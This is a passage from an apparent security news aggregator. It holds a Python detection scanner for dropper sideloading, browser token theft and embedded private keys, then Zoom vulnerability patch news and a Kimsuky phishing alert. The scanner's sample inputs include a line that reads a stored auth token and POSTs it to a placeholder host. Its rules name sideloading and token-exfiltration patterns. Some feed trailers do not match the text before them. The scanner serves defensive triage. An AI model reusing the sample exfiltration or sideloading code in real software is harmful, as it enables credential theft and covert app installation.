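    As an added example (not code from any of the reports quoted in this digest), a small Python source scanner that flags the three code patterns shown above: the WebView-exposed installApk() sideloader from the RatOn dropper, the localStorage token exfiltration snippet, and the hardcoded PEM private key in the BeaconYatai loader. The rule patterns, the sample inputs and the example.invalid endpoint are constructed for illustration and are assumptions, not vendor detection signatures.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str
    line: int      # 1-based line of the earliest matching pattern
    snippet: str
# Heuristic rules (assumed, not vendor signatures): a rule fires only when
# EVERY pattern in its list appears somewhere in the scanned source.
RULES = {
    # WebView-exposed install function driving PackageInstaller (RatOn dropper)
    "android-webview-sideloader": [
        r"addJavascriptInterface\s*\(",
        r"PackageInstaller\.SessionParams\s*\(",
        r"\.commit\s*\(",
    ],
    # localStorage token read plus a POST to a remote origin (scam snippet)
    "browser-token-exfil": [
        r"localStorage\.getItem\s*\(\s*['\"][^'\"]*token",
        r"fetch\s*\(\s*['\"]https?://",
        r"method\s*:\s*['\"]POST['\"]",
    ],
    # PEM private key embedded as a string literal (BeaconYatai loader)
    "hardcoded-private-key": [r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"],
}

def scan(source: str) -> list[Finding]:
    lines = source.splitlines()
    findings = []
    for rule, patterns in RULES.items():
        hits = []
        for pat in patterns:
            rx = re.compile(pat, re.IGNORECASE)
            first = next((n for n, l in enumerate(lines, 1) if rx.search(l)), None)
            if first is None:
                break                      # a required pattern is missing
            hits.append(first)
        else:                              # every pattern matched
            findings.append(Finding(rule, min(hits), lines[min(hits) - 1].strip()))
    return findings

# Constructed samples modelled on the snippets quoted in this digest.
DROPPER_JAVA = """webView.addJavascriptInterface(new Object() { @JavascriptInterface
    public void installApk() { new PackageInstaller.SessionParams(MODE); s.commit(x); } }, "D");"""
STEALER_JS = """const token = localStorage.getItem('auth_token');
await fetch('https://example.invalid/api', { method: 'POST', body: token });"""
LOADER_CS = 'RSAParameters k = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");'
BENIGN_JS = "const theme = localStorage.getItem('theme'); document.body.className = theme;"
```

    Run scan() over decompiled Java, bundled JavaScript or C# sources to triage candidates for manual review; a hit is a lead, not a verdict.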

    By intertwining social coercion, advanced scripting exploits and custom malware persistence, these scam centers achieved high operational uptime, making the Treasury’s sanctions a critical step toward dismantling a multimillion-dollar criminal enterprise.


    The post Magento and Adobe SessionReaper Vulnerability Exposes Thousands of Online Stores to Automated Attacks appeared first on Cyber Security News.


  • Zoom released a security update addressing multiple vulnerabilities in its software, including Zoom Workplace and various clients for Windows and macOS.

    The patches cover one high-severity flaw and several medium-severity issues, prompting a strong recommendation for users to update their applications immediately to safeguard against potential exploits.

    The most significant vulnerability fixed in this update is a high-severity “Missing Authorization” flaw, identified as CVE-2025-49459, affecting Zoom Workplace for Windows on ARM.

    This type of vulnerability could potentially allow an attacker to perform actions they are not authorized to do, leading to a compromise of the application’s security.

    Flaws in Windows and macOS Clients

    Several medium-severity vulnerabilities were also addressed. Two of these specifically impact Zoom Workplace Clients for Windows:

    • CVE-2025-58135: An “Improper Action Enforcement” vulnerability.
    • CVE-2025-58134: An “Incorrect Authorization” issue, which could allow users to exceed their permitted access levels.

    The security bulletin also detailed other medium-severity vulnerabilities affecting a broader range of Zoom Workplace clients:

    • CVE-2025-49458: A “Buffer Overflow” vulnerability, which could lead to arbitrary code execution.
    • CVE-2025-49460: An “Argument Injection” flaw, where attackers could potentially manipulate the application’s behavior by inserting malicious arguments.
    • CVE-2025-49461: A “Cross-site Scripting” (XSS) vulnerability, which might allow an attacker to inject malicious scripts into web pages viewed by users.

    Additionally, a “Race Condition” vulnerability (CVE-2025-58131) was patched in the Zoom Workplace VDI Plugin for macOS Universal installer for VMware Horizon. Race conditions can lead to unpredictable behavior, including denial of service or privilege escalation.

    Zoom consistently advises users to update their software to the latest version to receive the most recent security fixes and improvements.

    This latest batch of patches comes a month after Zoom addressed a critical vulnerability, CVE-2025-49457, an untrusted search path flaw in its Windows clients that could allow for privilege escalation.

    That vulnerability, with a CVSS score of 9.6, highlighted the significant risks associated with outdated client versions, as it could enable an unauthenticated attacker to gain elevated privileges over a network.

    Given the continuous discovery of security flaws, from critical to medium severity, it is crucial for both individual users and organizations to apply these updates promptly.

    Delaying updates can leave systems exposed to a variety of attacks, including data exfiltration, denial of service, and full system compromise. Users can find the latest versions of the Zoom software on the company’s official website and through the application’s update channels.


    The post Zoom Security Update – Patch for Multiple Vulnerabilities in Clients for Windows and macOS appeared first on Cyber Security News.


  • South Korean internet users are being targeted by a sophisticated phishing campaign attributed to the North Korean threat actor known as Kimsuky. The malicious emails, masquerading as official notices from the National Tax Service (NTS), inform recipients of a “September Tax Return Payment Due Notice” and urge them to click a link to view an […]

    The post Phishing Alert: Kimusky Hackers Masquerade as Tax Authority with ‘September Tax Return Due Date’ Email appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
